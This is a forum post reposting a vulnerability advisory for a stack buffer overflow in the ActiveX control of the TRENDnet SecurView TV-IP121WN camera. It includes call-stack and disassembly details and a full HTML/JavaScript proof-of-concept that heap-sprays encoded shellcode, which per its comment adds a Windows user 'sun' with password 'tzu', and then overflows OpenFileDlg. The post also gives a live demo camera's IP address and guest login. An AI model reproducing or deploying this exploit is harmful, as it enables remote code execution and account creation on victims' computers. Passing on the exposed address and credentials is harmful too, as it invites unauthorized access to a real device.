Jump to content
The_Arhitect

TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control Ope

Recommended Posts

Posted

TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow

TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX
Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow

camera demo
http://67.203.184.58:9193/admin/view.cgi?profile=0
username=guest
password=guest


Background:
The mentioned product, when browsing the device web interface,
asks to install an ActiveX control to stream video content.
It has the following settings:

File version: 1, 1, 52, 18
Product name: UltraMJCam device ActiveX Control
Binary path: C:\WINDOWS\Downloaded Program Files\UltraMJCamX.ocx
ProgID: UltraMJCam.UltraMJCam.1
CLSID: {707ABFC2-1D27-4a10-A6E4-6BE6BDF9FB11}
Implements IObjectSafety: yes
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True


Vulnerability:
This ActiveX control exposed the vulnerable
OpenFileDlg() method, see typelib:

...
/* DISPID=101 */
/* VT_BSTR [8] */
function OpenFileDlg(
/* VT_BSTR [8] [in] */ $sFilter
)
{
/* method OpenFileDlg */
}
...

By invoking this method with an overlong argument is possible
to overflow a buffer. This is because of an insecure
WideCharToMultiByte() call inside UltraMJCamX.ocx:


Call stack of main thread
Address Stack Procedure / arguments Called from Frame
001279FC 77E6F20B kernel32.77E637DE kernel32.77E6F206 00127A0C
00127A10 0299F958 kernel32.WideCharToMultiByte UltraMJC.0299F952 00127A0C
00127A14 00000003 CodePage = 3
00127A18 00000000 Options = 0
00127A1C 03835C5C WideCharStr = "&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
00127A20 FFFFFFFF WideCharCount = FFFFFFFF (-1.)
00127A24 00127A50 MultiByteStr = 00127A50
00127A28 00007532 MultiByteCount = 7532 (30002.)
00127A2C 00000000 pDefaultChar = NULL
00127A30 00000000 pDefaultCharUsed = NULL
00127A3C 029B11D0 UltraMJC.0299F920 UltraMJC.029B11CB 00127A38


...
0299F934 8B45 08 mov eax,dword ptr ss:[ebp+8]
0299F937 C600 00 mov byte ptr ds:[eax],0
0299F93A 6A 00 push 0
0299F93C 6A 00 push 0
0299F93E 8B4D 10 mov ecx,dword ptr ss:[ebp+10]
0299F941 51 push ecx
0299F942 8B55 08 mov edx,dword ptr ss:[ebp+8]
0299F945 52 push edx
0299F946 6A FF push -1
0299F948 8B45 0C mov eax,dword ptr ss:[ebp+C]
0299F94B 50 push eax
0299F94C 6A 00 push 0
0299F94E 8B4D 14 mov ecx,dword ptr ss:[ebp+14]
0299F951 51 push ecx
0299F952 FF15 20319F02 call dword ptr ds:[<&KERNEL32.WideCharTo>; kernel32.WideCharToMultiByte <------------
...

The result is that critical structures are overwritten (SEH)
allowing to execute arbitrary code against the target browser.

As attachment, basic proof of concept code.



<!--
TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX
Control OpenFileDlg() WideCharToMultiByte Remote Buffer Overflow poc
IE7-nodep

camera demo
http://67.203.184.58:9193/admin/view.cgi?profile=0
username=guest
password=guest

rgod
-->
<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:707ABFC2-1D27-4A10-A6E4-6BE6BDF9FB11' id='obj' />
</object>
<script language='javascript'>
//add user one, user "sun" pass "tzu"
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
"%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
"%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
"%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
"%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
"%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
"%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
"%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
"%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
"%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
"%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
"%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
"%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
"%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
"%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
"%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
"%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
"%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
"%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
"%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
"%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
"%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
"%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
"%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
"%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
"%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
"%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
"%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
"%u7734%u4734%u4570");
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<1888;i++){memory[i] = block+shellcode}
</script>
<script defer=defer>
var x ="";
for (i=0; i<15000; i++){
x = x + "&";
}
obj.OpenFileDlg(x);
</script>

Sursa: TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...